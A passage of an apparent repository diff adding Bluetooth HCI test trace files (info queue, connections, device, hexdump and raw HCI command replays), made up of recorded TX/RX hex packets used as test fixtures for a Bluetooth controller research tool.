RX 00e269c201231658
RX 040e08014dfc00501f2200
TX 0108004dfc05501f220004
RX 0000000900000009
RX 000000020000000000e269c20124484f
RX 014dfc05501f220004
RX 0000000b0000000b0000000300000000
RX 00e269c201244f7a
RX 040e08014dfc00741f2200
TX 0108004dfc05741f220004
RX 00000009
RX 00000009000000020000000000e269c201250543
RX 01
RX 4dfc05741f220004
RX 0000000b0000000b000000030000000000e269c2
RX 01250d7b
RX 040e08014dfc00981f2200
TX 0108004dfc05981f220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 0125e492
RX 014dfc05981f220004
RX 0000000b0000000b00000003
RX 0000000000e269c201260ab3
RX 040e08014dfc00bc1f2200
TX 0108004dfc05bc1f220004
RX 0000000900000009000000020000000000e269c2
RX 01276da0
RX 014dfc05bc1f220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201279c46
RX 040e08014dfc00e01f2200
TX 0108004dfc05e01f220004
RX 0000000900000009000000020000000000e269c2
RX 0128e461
RX 014dfc05e01f220004
RX 0000000b0000000b00000003
RX 0000000000e269c2012914b3
RX 040e08014dfc0000000000
Socket closed
tests/traces/adbcore/dictionary_tests/info_queue.trace
+148
View File
@@ -0,0 +1,148 @@
# info queue
TX 010300011000
RX 0000000400000004000000020000000000e269c2663770fc
RX 01011000
RX 0000000f0000000f000000030000000000e269c26637a4a7
RX 040e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc057c30200004
RX 00000003000000030000000300000000
RX 00e269c266390c8a
RX 07f001
RX 00000009
RX 000000090000000200000000
RX 00e269c2663974da
RX 01
RX 4dfc057c30200004
RX 0000000b0000000b
RX 000000030000000000e269c26639ac63
RX 040e08014dfc0090652000
TX 0108004dfc059065200038
RX 000000090000000900000002
RX 0000000000e269c2
RX 663b4f1a
RX 014dfc059065200038
RX 0000003f0000003f0000000300000000
RX 00e269c2663b83d8
RX 040e3c014dfc00554555510000000001000000100000000000000010000000c8652000086620000466200004662000000000000000000044662000ecad2000
TX 0108004dfc054466200038
RX 000000090000000900000002
RX 0000000000e269c2663d419c
RX 014dfc054466200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 663d7aab
RX 040e3c014dfc005545555100000000020000001f000000000000001f0000007c66200074672000ac662000ac66200000000000000000007467200090652000
TX 0108004dfc057467200038
RX 0000000900000009000000020000000000e269c2
RX 663ebb9e
RX 014dfc057467200038
RX 0000003f0000003f00000003
RX 0000000000e269c2663eeac6
RX 040e3c014dfc00554555510000000001000000030000000000000003000000ac672000b8672000ac672000ac6720000000000000000000b867200044662000
TX 0108004dfc05b867200038
RX 0000000900000009000000020000000000e269c26640af70
RX 01
RX 4dfc05b867200038
RX 0000003f0000003f
RX 000000030000000000e269c2
RX 6640e3ed
RX 040e3c014dfc005545555100000000010000001f000000000000001f000000f06720006c682000f0672000f067200000000000000000006c68200074672000
TX 0108004dfc056c68200038
RX 0000000900000009000000020000000000e269c26642a534
RX 014dfc056c68200038
RX 0000003f
RX 0000003f0000000300000000
RX 00e269c26642d8cd
RX 04
RX 0e3c014dfc00554555510000000001000000140000000000000014000000a4682000f4682000e0682000e06820000000000000000000f4682000b8672000
TX 0108004dfc05f468200038
RX 0000000900000009000000020000000000e269c266441bec
RX 014dfc05f468200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 6644504f
RX 040e3c014dfc005545555100000000020000000800000000000000080000002c6920006c6920002c6920002c69200000000000000000006c6920006c682000
TX 0108004dfc056c69200038
RX 000000090000000900000002
RX 0000000000e269c2
RX 664611cc
RX 014dfc056c69200038
RX 0000003f
RX 0000003f0000000300000000
RX 00e269c266464b12
RX 04
RX 0e3c014dfc00554555510000000002000000060000000000000006000000a4692000d4692000a4692000a46920000000000000000000d4692000f4682000
TX 0108004dfc05d469200038
RX 00000009000000090000000200000000
RX 00e269c266478916
RX 01
RX 4dfc05d469200038
RX 0000003f0000003f00000003
RX 0000000000e269c26647be39
RX 040e3c014dfc00554555510000000002000000010000000000000001000000100d2000180d2000100d2000100d200000000000000000000c6a20006c692000
TX 0108004dfc050c6a200038
RX 000000090000000900000002
RX 0000000000e269c2664987ae
RX 014dfc050c6a200038
RX 0000003f0000003f
RX 000000030000000000e269c2
RX 6649bc49
RX 040e3c014dfc00554555510000000002000000010000000000000001000000180d2000200d2000180d2000180d20000000000000000000446a2000d4692000
TX 0108004dfc05446a200038
RX 000000090000000900000002
RX 0000000000e269c2664af918
RX 014dfc05446a200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 664b2d9b
RX 040e3c014dfc005545555100000000020000002000000000000000200000007c6a20007c6b20007c6a20007c6a20000000000000000000903320000c6a2000
TX 0108004dfc059033200038
RX 0000000900000009000000020000000000e269c2664cf025
RX 014dfc059033200038
RX 0000003f0000003f
RX 000000030000000000e269c2
RX 664d236e
RX 040e3c014dfc005545555100000000020000000c000000000000000c0000009c732100fc732100ac732100ac7321000000000000000000705b2000446a2000
TX 0108004dfc05705b200038
RX 0000000900000009000000020000000000e269c2
RX 664ee493
RX 014dfc05705b200038
RX 0000003f0000003f0000000300000000
RX 00e269c2664f184e
RX 04
RX 0e3c014dfc00554555510000000001000000080000000000000008000000fc7321001c74210010742100107421000000000000000000c833200090332000
TX 0108004dfc05c833200038
RX 000000090000000900000002
RX 0000000000e269c2665059ac
RX 014dfc05c833200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 6650912f
RX 040e3c014dfc005545555100000000020000001300000000000000130000001c742100b47421001c7421001c7421000000000000000000b4512000705b2000
TX 0108004dfc05b451200038
RX 0000000900000009
RX 000000020000000000e269c266525485
RX 014dfc05b451200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 6652883b
RX 040e3c014dfc00554555510000000002000000060000000000000006000000b4742100e4742100b4742100b4742100000000000000000094ad2000c8332000
TX 0108004dfc0594ad200038
RX 000000090000000900000002
RX 0000000000e269c26653c77b
RX 014dfc0594ad200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 6653fcfb
RX 040e3c014dfc00554555510000000001000000080000000000000008000000ccad2000ecad2000ccad2000ccad20000000000000000000ecad2000b4512000
TX 0108004dfc05ecad200038
RX 0000000900000009
RX 000000020000000000e269c2
RX 6655bd0f
RX 014dfc05ecad200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 6655f6b7
RX 040e3c014dfc0055455551000000000100000010000000000000001000000024ae200064ae200024ae200024ae200000000000000000009065200094ad2000
Socket closed
tests/traces/adbcore/hci_0x1001.trace
+36
View File
@@ -0,0 +1,36 @@
# sendhcicmd 0x1001
TX 010300011000
RX 00000004
RX 00000004
RX 00000002
RX 00000000
RX 00e269bf
RX 571013e3
RX 01
RX 011000
RX 0000000f0000000f
RX 00000003
RX 00000000
RX 00e269bf
RX 57105c83
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
RX 000000030000000300000003
RX 0000000000e269bf571262bd
RX 07
RX f001
TX 010300011000
RX 000000040000000400000002
RX 00000000
RX 00e269bf
RX 573133d5
RX 01
RX 011000
RX 0000000f
RX 0000000f
RX 0000000300000000
RX 00e269bf57317b7a
RX 04
RX 0e0c01011000075301070f000961
Socket closed
tests/traces/adbcore/hci_0x1337.trace
+33
View File
@@ -0,0 +1,33 @@
# sendhcicmd 0x1337
TX 010300011000
RX 00000004
RX 00000004
RX 00000002
RX 00000000
RX 00e269bf
RX 5a00c7f5
RX 01
RX 011000
RX 0000000f
RX 0000000f0000000300000000
RX 00e269bf
RX 5a011119
RX 040e0c01011000075301070f000961
TX 070200f001
RX 000000030000000300000003
RX 0000000000e269bf5a030c96
RX 07f001
TX 010300371300
RX 000000040000000400000002
RX 00000000
RX 00e269bf
RX 5a7baf54
RX 01
RX 371300
RX 0000000700000007
RX 00000003
RX 00000000
RX 00e269bf
RX 5a7bf8b7
RX 040e0401371301
Socket closed
tests/traces/adbcore/hexdump_0.trace
+34
View File
@@ -0,0 +1,34 @@
# hexdump 0
TX 010300011000
RX 0000000400000004000000020000000000e269bf52d3099e
RX 01011000
RX 0000000f0000000f000000030000000000e269bf52d351f1
RX 040e0c01011000075301070f000961
TX 070200f001
RX 00000003000000030000000300000000
RX 00e269bf52d43cea
RX 07f001
TX 0108004dfc0500000000fb
RX 000000090000000900000002
RX 00000000
RX 00e269bf
RX 530f0c74
RX 01
RX 4dfc0500000000fb
RX 00000102
RX 00000102
RX 00000003
RX 00000000
RX 00e269bf
RX 530f5400
RX 04
RX 0eff014dfc0000042000010200009f7506006775060067750600677506006775060000000000000000000000000000000000c5880600a175060000000000c588060095750600b1750600d5750600d5750600d5750600d5750600d5750600d5750600d5750600d5750600d5750600c3750600e7750600e7750600e7750600e7750600f9750600077606001576060023760600317606003f7606008576060093760600a5760600677506004d760600a3750600a3750600a3750600cb7606006775060067750600d9760600e7760600f57606000377060067750600677506006775060067750600357706002777060067750600677506005177060043770600117706
TX 0108004dfc05fb00000005
RX 000000090000000900000002
RX 0000000000e269bf5310814f
RX 014dfc05fb00000005
RX 0000000c0000000c
RX 000000030000000000e269bf
RX 5310b34e
RX 040e09014dfc000067750600
Socket closed
tests/traces/adbcore/info_connections.trace
+187
View File
@@ -0,0 +1,187 @@
#info connections
TX 010300011000
RX 0000000400000004000000020000000000e269c211af9287
RX 01011000
RX 0000000f0000000f000000030000000000e269c211afc606
RX 040e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc05e8382000fb
RX 000000030000000300000003
RX 0000000000e269c211b12cec
RX 07f001
RX 00000009000000090000000200000000
RX 00e269c211b19677
RX 01
RX 4dfc05e8382000fb
RX 0000010200000102
RX 000000030000000000e269c2
RX 11b1ce0d
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05e339200051
RX 0000000900000009000000020000000000e269c211b36d33
RX 01
RX 4dfc05e339200051
RX 0000005800000058
RX 000000030000000000e269c2
RX 11b39be7
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05343a2000fb
RX 000000090000000900000002
RX 0000000000e269c211b5679f
RX 014dfc05343a2000fb
RX 000001020000010200000003
RX 0000000000e269c211b59bbc
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc052f3b200051
RX 000000090000000900000002
RX 0000000000e269c211b6da65
RX 014dfc052f3b200051
RX 00000058
RX 000000580000000300000000
RX 00e269c211b7103c
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05803b2000fb
RX 00000009000000090000000200000000
RX 00e269c211b8d0df
RX 01
RX 4dfc05803b2000fb
RX 000001020000010200000003
RX 0000000000e269c211b90a7f
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc057b3c200051
RX 0000000900000009000000020000000000e269c211ba4851
RX 01
RX 4dfc057b3c200051
RX 0000005800000058
RX 000000030000000000e269c2
RX 11ba776c
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05cc3c2000fb
RX 000000090000000900000002
RX 0000000000e269c211bc4807
RX 014dfc05cc3c2000fb
RX 0000010200000102
RX 000000030000000000e269c211bc7e24
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05c73d200051
RX 0000000900000009000000020000000000e269c211bdb8a1
RX 014dfc05c73d200051
RX 0000005800000058
RX 000000030000000000e269c2
RX 11bded98
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05183e2000fb
RX 0000000900000009000000020000000000e269c211bfb647
RX 01
RX 4dfc05183e2000fb
RX 0000010200000102
RX 000000030000000000e269c2
RX 11bfe6b2
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05133f200051
RX 0000000900000009000000020000000000e269c211c1aa86
RX 014dfc05133f200051
RX 00000058
RX 00000058000000030000000000e269c2
RX 11c1da6e
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05643f2000fb
RX 0000000900000009000000020000000000e269c2
RX 11c31d18
RX 014dfc05643f2000fb
RX 00000102000001020000000300000000
RX 00e269c211c35297
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc055f40200051
RX 000000090000000900000002
RX 0000000000e269c211c51823
RX 014dfc055f40200051
RX 00000058
RX 000000580000000300000000
RX 00e269c211c54c9e
RX 04
RX 0e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05b0402000fb
RX 000000090000000900000002
RX 0000000000e269c211c689b0
RX 014dfc05b0402000fb
RX 00000102
RX 000001020000000300000000
RX 00e269c211c6bf30
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05ab41200051
RX 000000090000000900000002
RX 0000000000e269c2
RX 11c88437
RX 014dfc05ab41200051
RX 00000058
RX 000000580000000300000000
RX 00e269c211c8ba69
RX 04
RX 0e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05fc412000fb
RX 000000090000000900000002
RX 0000000000e269c211c9f7a0
RX 014dfc05fc412000fb
RX 00000102
RX 00000102000000030000000000e269c2
RX 11ca2c9d
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05f742200051
RX 000000090000000900000002
RX 0000000000e269c211cbee6a
RX 014dfc05f742200051
RX 00000058
RX 00000058000000030000000000e269c2
RX 11cc2779
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc0548432000fb
RX 0000000900000009000000020000000000e269c2
RX 11cde3be
RX 014dfc0548432000fb
RX 00000102
RX 000001020000000300000000
RX 00e269c211ce175c
RX 04
RX 0eff014dfc000900000000000000000000000000000000000000000000000000777700c91000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000007d0000007d00000c001eff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002800000000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff0000000100000000000000f0ff0000000000000000000001c4000000000000
TX 0108004dfc054344200051
RX 0000000900000009000000020000000000e269c2
RX 11cf5a52
RX 014dfc054344200051
RX 000000580000005800000003
RX 0000000000e269c211cf8917
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc0594442000fb
RX 0000000900000009000000020000000000e269c211d14fcf
RX 01
RX 4dfc0594442000fb
RX 0000010200000102
RX 000000030000000000e269c211d182db
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc058f45200051
RX 0000000900000009000000020000000000e269c2
RX 11d2c911
RX 014dfc058f45200051
RX 00000058000000580000000300000000
RX 00e269c211d2f819
RX 04
RX 0e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05e0452000fb
RX 0000000900000009
RX 000000020000000000e269c211d4c00a
RX 014dfc05e0452000fb
RX 00000102
RX 00000102000000030000000000e269c2
RX 11d4fa18
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05db46200051
RX 0000000900000009
RX 000000020000000000e269c211d6b5d7
RX 014dfc05db46200051
RX 00000058
RX 00000058000000030000000000e269c2
RX 11d6efa7
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Socket closed
tests/traces/adbcore/info_connections_2.trace
+168
View File
@@ -0,0 +1,168 @@
# info connections
TX 010300011000
RX 0000000400000004000000020000000000e26b46e2c309cc
RX 01011000
RX 0000000f0000000f000000030000000000e26b46e2c3274f
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc05e8382000fb
RX 000000030000000300000003
RX 0000000000e26b46e2c428e8
RX 07
RX f001
RX 0000000900000009000000020000000000e26b46
RX e2c446b6
RX 014dfc05e8382000fb
RX 00000102000001020000000300000000
RX 00e26b46e2c46686
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05e339200051
RX 0000000900000009000000020000000000e26b46e2c54298
RX 01
RX 4dfc05e339200051
RX 0000005800000058
RX 000000030000000000e26b46e2c55b0a
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05343a2000fb
RX 0000000900000009000000020000000000e26b46e2c66e34
RX 014dfc05343a2000fb
RX 000001020000010200000003
RX 0000000000e26b46e2c68443
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc052f3b200051
RX 000000090000000900000002
RX 0000000000e26b46e2c790ea
RX 014dfc052f3b200051
RX 00000058000000580000000300000000
RX 00e26b46e2c7af14
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05803b2000fb
RX 000000090000000900000002
RX 0000000000e26b46e2c8a5a1
RX 014dfc05803b2000fb
RX 00000102000001020000000300000000
RX 00e26b46e2c8c6f1
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc057b3c200051
RX 0000000900000009000000020000000000e26b46e2c987eb
RX 014dfc057b3c200051
RX 0000005800000058000000030000000000e26b46
RX e2c9a0dd
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05cc3c2000fb
RX 000000090000000900000002
RX 0000000000e26b46e2caa510
RX 014dfc05cc3c2000fb
RX 0000010200000102000000030000000000e26b46
RX e2cac525
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05c73d200051
RX 0000000900000009000000020000000000e26b46e2cbcf4b
RX 01
RX 4dfc05c73d200051
RX 000000580000005800000003
RX 0000000000e26b46e2cbf034
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05183e2000fb
RX 0000000900000009000000020000000000e26b46e2cca023
RX 014dfc05183e2000fb
RX 000001020000010200000003
RX 0000000000e26b46e2ccc67f
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05133f200051
RX 00000009000000090000000200000000
RX 00e26b46e2cda8a4
RX 01
RX 4dfc05133f200051
RX 0000005800000058000000030000000000e26b46e2cdce30
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05643f2000fb
RX 0000000900000009000000020000000000e26b46
RX e2ced9d5
RX 014dfc05643f2000fb
RX 000001020000010200000003
RX 0000000000e26b46e2cef558
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc055f40200051
RX 000000090000000900000002
RX 0000000000e26b46e2cf504b
RX 014dfc055f40200051
RX 00000058000000580000000300000000
RX 00e26b46e2cf73b7
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05b0402000fb
RX 000000090000000900000002
RX 0000000000e26b46e2d06c12
RX 014dfc05b0402000fb
RX 0000010200000102000000030000000000e26b46
RX e2d093f7
RX 040eff014dfc0007000000000000000000000000000007000000000000000000007711572d980700000000000010002e1a3a022300feb10a00c821ffff8ffa9bff59870100000000000000000000000000000000000000000000000000008d0500fa0a401f0000401f00000c001adddbea2d9c47bc1aa6afe664ff31591aa6e98a5eaaff39ecb5ce4447590dfb73a4161203cd6e77be6a4bcfb3ee52d3e2c40000000028000404000000130000001000000000020001003c002003001800009c7e1200b00402000200000002000101010200000000000000000000ffffffffffffffff0000000100000000000005f8ff001add0020000000000015d1000000000000
TX 0108004dfc05ab41200051
RX 000000090000000900000002
RX 0000000000e26b46e2d18faa
RX 014dfc05ab41200051
RX 0000005800000058000000030000000000e26b46e2d1ade2
RX 040e55014dfc000000000000000000000000000000000000a4000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000400000001000000
TX 0108004dfc05fc412000fb
RX 0000000900000009000000020000000000e26b46e2d2b2dd
RX 014dfc05fc412000fb
RX 0000010200000102000000030000000000e26b46e2d2ceb2
RX 040eff014dfc000800000000000000000000000000000000000000000000000000777700c91000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000007d0000007d00000b001eff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002800000000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff0000000100000000000000f0ff0000000000000000000001c4000000000000
TX 0108004dfc05f742200051
RX 0000000900000009000000020000000000e26b46e2d3c699
RX 01
RX 4dfc05f742200051
RX 00000058000000580000000300000000
RX 00e26b46e2d3e510
RX 04
RX 0e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc0548432000fb
RX 0000000900000009000000020000000000e26b46e2d563ce
RX 014dfc0548432000fb
RX 00000102000001020000000300000000
RX 00e26b46e2d57e0a
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc054344200051
RX 0000000900000009000000020000000000e26b46e2d62821
RX 014dfc054344200051
RX 000000580000005800000003
RX 0000000000e26b46e2d63ad6
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc0594442000fb
RX 0000000900000009
RX 000000020000000000e26b46
RX e2d6c43c
RX 014dfc0594442000fb
RX 00000102000001020000000300000000
RX 00e26b46e2d6ebde
RX 04
RX 0eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc058f45200051
RX 0000000900000009000000020000000000e26b46e2d7daf3
RX 01
RX 4dfc058f45200051
RX 00000058000000580000000300000000
RX 00e26b46e2d7fab5
RX 04
RX 0e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05e0452000fb
RX 0000000900000009
RX 000000020000000000e26b46
RX e2d8ed9a
RX 014dfc05e0452000fb
RX 00000102000001020000000300000000
RX 00e26b46e2d91d63
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05db46200051
RX 0000000900000009
RX 000000020000000000e26b46
RX e2da0321
RX 014dfc05db46200051
RX 0000005800000058000000030000000000e26b46e2da2145
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
RX 0000001a
Socket closed
tests/traces/adbcore/info_device.trace
+44
View File
@@ -0,0 +1,44 @@
#info device
TX 010300011000
RX 00000004
RX 00000004
RX 00000002
RX 00000000
RX 00e269c2
RX 1010a0f2
RX 01
RX 011000
RX 0000000f
RX 0000000f
RX 00000003
RX 00000000
RX 00e269c2
RX 1010e99d
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc052c0c210006
RX 0000000300000003000000030000000000e269c210128aa7
RX 07f001
RX 000000090000000900000002
RX 0000000000e269c210129ad2
RX 014dfc052c0c210006
RX 0000000d
RX 0000000d000000030000000000e269c2
RX 1012a345
RX 040e0a014dfc00f1037dc795f8
TX 0108004dfc05b4782100fb
RX 0000000900000009000000020000000000e269c210130715
RX 014dfc05b4782100fb
RX 0000010200000102000000030000000000e269c2
RX 10130fc0
RX 04
